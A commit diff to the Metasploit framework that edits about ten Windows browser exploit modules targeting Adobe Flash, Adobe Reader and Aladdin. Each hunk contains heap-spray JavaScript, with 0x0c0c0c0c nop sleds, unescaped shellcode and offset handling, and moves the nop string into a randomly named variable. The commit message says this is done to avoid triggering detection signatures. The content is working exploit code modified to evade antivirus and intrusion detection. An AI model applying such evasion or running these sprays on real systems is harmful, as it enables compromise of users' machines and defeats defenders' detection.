Avoid calling unescape on nops directly

Using an intermediate variable will avoid triggering signatures

Author: mrjefftang

modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb

@@ -210,11 +210,13 @@ def on_request_uri(cli, request)
 
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     js_pivot = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{my_target['Offset']});

modules/exploits/windows/browser/adobe_flash_rtmp.rb

@@ -140,11 +140,13 @@ def get_rop_chain(t)
   end
 
   def get_easy_spray(t, js_code, js_nops)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
 
@@ -168,11 +170,13 @@ def get_easy_spray(t, js_code, js_nops)
 
 
   def get_aligned_spray(t, js_rop, js_nops)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
 
     var heap_obj = new heapLib.ie(0x20000);
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
     var rop_chain = unescape("#{js_rop}");
 
     while (nops.length < 0x80000) nops += nops;

modules/exploits/windows/browser/adobe_flash_sps.rb

@@ -116,11 +116,13 @@ def on_request_uri(cli, request)
 
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     js = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{my_target['Offset']});

modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb

@@ -210,6 +210,9 @@ def on_request_uri(cli, request)
       js_extract_str = "var block = shellcode.substring(0, (0x80000-6)/2);"
     end
 
+    randnop = rand_text_alpha(rand(100) + 1)
+    js_nops = Rex::Text.to_unescape("\x0c"*4)
+
     js = <<-JS
     function heap_spray(heaplib, nops, code, offset, max) {
       while (nops.length < 0x2000) nops += nops;
@@ -224,7 +227,8 @@ def on_request_uri(cli, request)
     }
 
     var heap_obj = new heapLib.ie(0x20000);
-    var nops = unescape("%u0c0c%u0c0c");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
     var code = unescape("#{shellcode}");
     heap_spray(heap_obj, nops, code, #{my_target['Offset1']}, #{my_target['Max1']});
     var fake_pointers = unescape("#{pivot}");

modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb

@@ -88,14 +88,16 @@ def on_request_uri(cli, request)
 
     # Make some nops
     nops    = Rex::Text.to_unescape(make_nops(4))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Randomize variables
     rand1  = rand_text_alpha(rand(100) + 1)
     rand2  = rand_text_alpha(rand(100) + 1)
 
     script = %Q|
 var #{rand1} = unescape("#{shellcode}");
-var #{rand2} = unescape("#{nops}");
+var #{randnop} = "#{nops}";
+var #{rand2} = unescape(#{randnop});
 while (#{rand2}.length < #{target['Size']}) #{rand2} += #{rand2};
 #{rand2} = #{rand2}.substring(0, #{target['Size']} - #{rand1}.length);
 memory = new Array();

modules/exploits/windows/browser/adobe_geticon.rb

@@ -92,13 +92,15 @@ def on_request_uri(cli, request)
     rand10 = rand_text_alpha(rand(100) + 1)
     rand11 = rand_text_alpha(rand(100) + 1)
     rand12 = rand_text_alpha(rand(100) + 1)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     script = %Q|
     var #{rand1} = unescape("#{shellcode}");
     var #{rand2} ="";
-    for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape("#{nops}");
+    var #{randnop} = "#{nops}";
+    for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape("#{randnop}");
     #{rand4} = #{rand2} + #{rand1};
-    #{rand5} = unescape("#{nops}");
+    #{rand5} = unescape(#{randnop});
     #{rand6} = 20;
     #{rand7} = #{rand6}+#{rand4}.length
     while (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5};

modules/exploits/windows/browser/adobe_jbig2decode.rb

@@ -86,16 +86,18 @@ def on_request_uri(cli, request)
     rand14	= rand_text_alpha(rand(50) + 1)
     rand15	= rand_text_alpha(rand(50) + 1)
     rand16	= rand_text_alpha(rand(50) + 1)
+    randnop     = rand_text_alpha(rand(100) + 1)
 
     script = %Q|
     var #{rand1} = "";
     var #{rand2} = "";
     var #{rand3} = unescape("#{shellcode}");
     var #{rand4} = "";
+    var #{randnop} = "#{nops}";
 
-    for (#{rand5}=128;#{rand5}>=0;--#{rand5}) #{rand4} += unescape("#{nops}");
+    for (#{rand5}=128;#{rand5}>=0;--#{rand5}) #{rand4} += unescape(#{randnop});
     #{rand6} = #{rand4} + #{rand3};
-    #{rand7} = unescape("#{nops}");
+    #{rand7} = unescape(#{randnop});
     #{rand8} = 20;
     #{rand9} = #{rand8}+#{rand6}.length
     while (#{rand7}.length<#{rand9}) #{rand7}+=#{rand7};

modules/exploits/windows/browser/adobe_media_newplayer.rb

@@ -107,6 +107,7 @@ def on_request_uri(cli, request)
     rand3  = rand_text_alpha(rand(100) + 1)
     rand4  = rand_text_alpha(len/2).gsub(/([dhHjmMsty])/m, '\\\\' + '\1')
     rand5  = rand_text_alpha(len/2).gsub(/([dhHjmMsty])/m, '\\\\' + '\1')
+    randnop = rand_text_alpha(rand(100) + 1)
 
     vtbuf = [target.ret].pack('V') * 4
     vtbuf << rand_text_alpha(len - vtbuf.length)
@@ -115,8 +116,9 @@ def on_request_uri(cli, request)
 
     # The printd strings are 72 bytes (??)
     script = %Q|
+var #{randnop} = "#{nops}";
 var #{rand1} = unescape("#{shellcode}");
-var #{rand2} = unescape("#{nops}");
+var #{rand2} = unescape(#{randnop});
 var #{rand3} = unescape("#{retstring}");
 while(#{rand2}.length <= #{target['Size']}) #{rand2}+=#{rand2};
 #{rand2}=#{rand2}.substring(0,#{target['Size']} - #{rand1}.length);

modules/exploits/windows/browser/adobe_utilprintf.rb

@@ -73,13 +73,15 @@ def on_request_uri(cli, request)
     rand9  = rand_text_alpha(rand(100) + 1)
     rand10 = rand_text_alpha(rand(100) + 1)
     rand11 = rand_text_alpha(rand(100) + 1)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     script = %Q|
     var #{rand1} = unescape("#{shellcode}");
+    var #{randnop} = "#{nops}";
     var #{rand2} ="";
-    for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape("#{nops}");
+    for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape(#{randnop});
     #{rand4} = #{rand2} + #{rand1};
-    #{rand5} = unescape("#{nops}");
+    #{rand5} = unescape("#{randnop}");
     #{rand6} = 20;
     #{rand7} = #{rand6}+#{rand4}.length
     while (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5};

modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb

@@ -117,13 +117,15 @@ def initialize(info={})
   def ie_heap_spray(p)
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(get_target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(get_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Land the payload at 0x0c0c0c0c
 
     js = %Q|
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{get_target['Offset']});
     var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);